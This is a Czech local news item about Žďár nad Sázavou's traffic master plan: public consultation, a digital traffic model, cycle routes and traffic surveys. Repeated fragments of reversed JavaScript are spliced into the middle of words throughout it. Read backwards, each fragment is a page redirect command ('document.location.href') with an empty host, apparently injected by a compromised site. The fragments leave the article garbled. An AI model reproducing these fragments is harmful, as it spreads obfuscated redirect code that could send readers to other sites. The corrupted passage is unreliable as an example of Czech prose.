Rainbow page separator

Generel dopravy budou moci lidé připomínkovat na podzim

Neděle, 25. července 2021

Žďár nad Sázavou / Po prázdninách bude obyvatelům Žďáru představen takzvaný generel dopravy, který vznikal také díky spolupráci veřejnosti. Došlo k vyhodnocení slabých a silných stránek žďárské dopravy, příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí a možných rizik i rozboru problémů v jednotlivých lokalitách, přičemž podrobné informace k dispozici na webu www.generel.zdarns.cz. Z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho vyplynou návrhy pro konkrétní řešení problémů, na nichž dodavatel generelu spolupracuje s pracovní skupinou i odbornou veřejností, které budou následně podrobeny kritice obyvatel.
Výsledkem komplexní analýzy dat má být digitální model dopravy, který umožní posoudit změny v zatížení jednotlivých komunikací ještě před tím, než budou provedeny. Součástí dopravního generelu je rovněž pasport komunikací včetně základní sítě cyklostezek a cyklotras i vedení linek MHD. Při tvorbě generelu bylo v průběhu loňského roku využi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to rovněž sčítání dopravy, ale i dotazníkové šetření či on-line průzkumy. Cílem se staly všechny druhy dopravy, kromě mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristů se sledovala také dopravní zátěž v různých lokalitách města ze strany chodců i cyklistů s následným zaměřením na jejich potřeby.